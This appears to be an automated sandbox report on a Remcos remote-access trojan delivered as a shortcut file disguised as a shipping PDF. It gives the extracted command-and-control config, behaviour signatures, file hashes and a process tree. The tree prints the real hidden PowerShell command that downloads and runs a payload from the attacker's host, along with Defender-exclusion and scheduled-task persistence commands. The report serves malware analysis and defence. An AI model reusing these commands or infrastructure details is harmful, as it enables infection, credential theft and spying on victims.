Overview

overview

10

Static

static

1

HBL10909LI...DF.lnk

windows7-x64

8

HBL10909LI...DF.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    273s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 09:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF/HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk

  • Size

    2KB

  • MD5

    b3173ef1cf4572a76e159dc513e3fc31

  • SHA1

    dbb727b41a95e6976afb742741af16952467af00

  • SHA256

    82277e734f339a7fce08aac2b342fae94e20f3349a568b839d39ccd3a81cc215

  • SHA512

    3e479a063085634ccce4bd04645c16c61ef357f44a97a71be95abbed4e30eca27fe661e302e04f9d699dcf7454f6ee0b15304f02e49f7ad8d815db65b64f8909

Score
10/10
remcossept 03 2024collectioncredential_accessdiscoveryexecutionratspywarestealer

Malware Config

Extracted

Family

remcos

Botnet

Sept 03 2024

C2

salonirang.duckdns.org:54604

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    bookmark

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Rmc-SPKD1X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 45 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF\HBL10909LIT266NR5272RBL2021PRD66178278_LAX2778.PDF.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest -Uri "http://tradimex.cc/eDVkOEaO/KD20240829230014246600006B6BA327.pdf" -OutFile "$env:TEMP\spoof.pdf"; Start-Process "$env:TEMP\spoof.pdf"; Start-Sleep -Seconds 20; Invoke-WebRequest -Uri "http://tradimex.cc/DgjopIWH/TJgGO5EprAaBIME.pif" -OutFile "$env:TEMP\target.pif"; Start-Process "$env:TEMP\target.pif""
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:836
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spoof.pdf"
        3⤵
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4820
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C5370A42480DFF2BDC77E9F9205E557E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4764
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=37C9961F00865BD3E2F33B6FE6CA25C1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=37C9961F00865BD3E2F33B6FE6CA25C1 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4780
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4E16091F3C4115A7E44EF1FFBE2FA871 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:848
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A521C0F2147FA1ED981504124B668D3F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A521C0F2147FA1ED981504124B668D3F --renderer-client-id=5 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job /prefetch:1
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2776
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=458D5909F90C615850F6D95EE6C85853 --mojo-platform-channel-handle=1888 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3004
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D361468A2930C98CB541D65893495FD4 --mojo-platform-channel-handle=2396 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4216
      • C:\Users\Admin\AppData\Local\Temp\target.pif
        "C:\Users\Admin\AppData\Local\Temp\target.pif"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4284
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\target.pif"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4132
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gVmBHRfidrI.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1088
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gVmBHRfidrI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFA49.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:848
        • C:\Users\Admin\AppData\Local\Temp\target.pif
          "C:\Users\Admin\AppData\Local\Temp\target.pif"
          4⤵
          • Executes dropped EXE
          PID:3780
        • C:\Users\Admin\AppData\Local\Temp\target.pif
          "C:\Users\Admin\AppData\Local\Temp\target.pif"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          PID:4708
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\rouuvriknikzxy"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3132
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\bjhmvjtljrceheuof"
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:2192
          • C:\Users\Admin\AppData\Local\Temp\target.pif
            C:\Users\Admin\AppData\Local\Temp\target.pif /stext "C:\Users\Admin\AppData\Local\Temp\llmfwcdfxzuqklqsxwsc"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3640
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
      PID:4948
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4460,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8
      1⤵
        PID:4612

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
        Filesize

        64KB

        MD5

        9cc0d83bd5fb964b14a5ea0c8f7b3c77

        SHA1

        df64df17119ebc800daf5f1d784fe531ebe4fb36

        SHA256

        e503a5a5b0471c568d398b689b834d453a777a1e85d3b645e498141e705895c7

        SHA512

        9a028fef5e5df99d8fcd6cb04694ccf9a49f7921505d3c0b10e66d5b7f0fcfab1edc4aa9441ad54f5dfc2e2b21ff69000aa595ed9a87f3529dd87fd9cce7082e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
        Filesize

        36KB

        MD5

        b30d3becc8731792523d599d949e63f5

        SHA1

        19350257e42d7aee17fb3bf139a9d3adb330fad4

        SHA256

        b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

        SHA512

        523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
        Filesize

        56KB

        MD5

        752a1f26b18748311b691c7d8fc20633

        SHA1

        c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

        SHA256

        111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

        SHA512

        a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        027f752ee0cbbc3ac151148c1292faee

        SHA1

        79a3e6fd6e0a6db95f8d45eb761a629c260f937c

        SHA256

        0359fc2210c62b1c352b0583904cb485b6310146c4f47b6838b08350bd25a1da

        SHA512

        0db6ef15ed79c8dea5ab0596c6221b396b63164ba8250c5cab384e4e5664d72108cdc87b0a7318e56a1ed9b99276bf8cc170130bda85c54534f86c6eb2420a97

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_btbcfsff.ttl.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\rouuvriknikzxy
        Filesize

        4KB

        MD5

        cda83eba5a004554ccdc061fd3df499c

        SHA1

        58ff2ecb9d47be10335e104896c87c62dc328523

        SHA256

        e384f4d46587646c6e0f9d2ee90b7bc57b49cea936b37cf8ab81ef3c4ce468ac

        SHA512

        f55ce20f0cf8b603fad765b889607f967c22d377fa4ac417ba1309d0aced9231e197bb4107d1c92bb99f51c04cc68ce26148727a8b694886710100c01f3de597

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\spoof.pdf
        Filesize

        832KB

        MD5

        24961fcde4d360d324f73c465a451ca6

        SHA1

        1988741b844c4f3cafd9d3c9505ea2c35c36db75

        SHA256

        f141c8b55ef363b72d0fdba9f8e67af281a09861cb58dbcbdfff516f2d9cb0d0

        SHA512

        b2de11c3716259fc886b310763d04ef7563717dda4964fa66f89dd4a690655247aa8643d1dbd93a6ea500de017b55f68743df9aa55378a7a213b04f52795bc9a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\target.pif
        Filesize

        908KB

        MD5

        b2125f1650b58eddaa86b18ed64871a5

        SHA1

        d28fd63324a74b0c61a29e964f863bf79668f9a6

        SHA256

        717ba8a5452f784b6c8df7936a0c4668720cf0ad480b9dfab9028056d398a466

        SHA512

        f8620026e270376e561da0d5a2f458b10476db82c426bc8261dfeb66f3d3d2f9ff5d96abd69b712d492ae878b0f2f69da0bf836bed59bc23818062f83b9e7c85

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpFA49.tmp
        Filesize

        1KB

        MD5

        1ef968e667f6e9a12b346859270e852c

        SHA1

        a6be7c4687ba341af714f1bf326b1afbb2d9eb39

        SHA256

        56bf0f330c6f11ef74b00743f2a91f1366682c7fb275fcb75c0877bf210cb417

        SHA512

        0b55c477342b92b77bc6377250f83bbcc2e9d3ba6a3e436a93d05b133cdfbf1435a07a0ca21d0fa5fc7e6df844973848eaf45ee63901310e9c78ccae19d251f7

        Download Submit

      • C:\Users\Admin\AppData\Roaming\bookmark\logs.dat
        Filesize

        184B

        MD5

        425c1d0d85c7c5577cd0a2d8a4b80695

        SHA1

        46eb886b9b6b29a2e1438ab0c1bb65df65a5b617

        SHA256

        29bff5ef4eb69bfebdeebd8cf63207198b58f97a66ba46e6a5dd3331328a93f6

        SHA512

        45312e3bb1701b94b14a0a27776457549ef3254c5bbe84e509116d8b9e94c5e97de8c85e575f76aab9cd15355036819e146b3473ff424e25fe4b7a48020a1a9f

        Download Submit

      • memory/836-37-0x00007FF967160000-0x00007FF967C21000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/836-2-0x00007FF967163000-0x00007FF967165000-memory.dmp

        Filesize

        8KB

        Download

      • memory/836-150-0x00007FF967160000-0x00007FF967C21000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/836-18-0x00007FF967163000-0x00007FF967165000-memory.dmp

        Filesize

        8KB

        Download

      • memory/836-14-0x00007FF967160000-0x00007FF967C21000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/836-3-0x0000023FE3EA0000-0x0000023FE3EC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/836-13-0x00007FF967160000-0x00007FF967C21000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1088-222-0x0000000007E70000-0x00000000084EA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1088-211-0x0000000064CA0000-0x0000000064CEC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1088-226-0x0000000007A30000-0x0000000007A41000-memory.dmp

        Filesize

        68KB

        Download

      • memory/1088-227-0x0000000007A60000-0x0000000007A6E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1088-230-0x0000000007B50000-0x0000000007B58000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2192-245-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/2192-250-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/2192-248-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

        Download

      • memory/3132-249-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/3132-247-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/3132-243-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

        Download

      • memory/3640-254-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/3640-253-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/3640-251-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

        Download

      • memory/4132-165-0x0000000004E00000-0x0000000004E66000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4132-164-0x0000000004D60000-0x0000000004D82000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4132-198-0x0000000005E70000-0x0000000005EBC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4132-200-0x0000000064CA0000-0x0000000064CEC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4132-199-0x0000000006280000-0x00000000062B2000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4132-210-0x0000000006260000-0x000000000627E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4132-212-0x0000000006EB0000-0x0000000006F53000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4132-197-0x0000000005D00000-0x0000000005D1E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4132-162-0x0000000002430000-0x0000000002466000-memory.dmp

        Filesize

        216KB

        Download

      • memory/4132-223-0x0000000006FC0000-0x0000000006FDA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4132-224-0x0000000007030000-0x000000000703A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4132-225-0x0000000007240000-0x00000000072D6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4132-163-0x0000000005070000-0x0000000005698000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/4132-166-0x0000000004EE0000-0x0000000004F46000-memory.dmp

        Filesize

        408KB

        Download

      • memory/4132-228-0x0000000007200000-0x0000000007214000-memory.dmp

        Filesize

        80KB

        Download

      • memory/4132-229-0x0000000007300000-0x000000000731A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4132-186-0x00000000057A0000-0x0000000005AF4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/4284-157-0x0000000009280000-0x000000000931C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/4284-156-0x0000000006C20000-0x0000000006CE2000-memory.dmp

        Filesize

        776KB

        Download

      • memory/4284-151-0x0000000000330000-0x000000000041A000-memory.dmp

        Filesize

        936KB

        Download

      • memory/4284-152-0x00000000052C0000-0x0000000005864000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4284-153-0x0000000004DF0000-0x0000000004E82000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4284-154-0x0000000004EC0000-0x0000000004ECA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4284-155-0x0000000006750000-0x0000000006760000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4708-271-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-236-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-194-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/4708-191-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

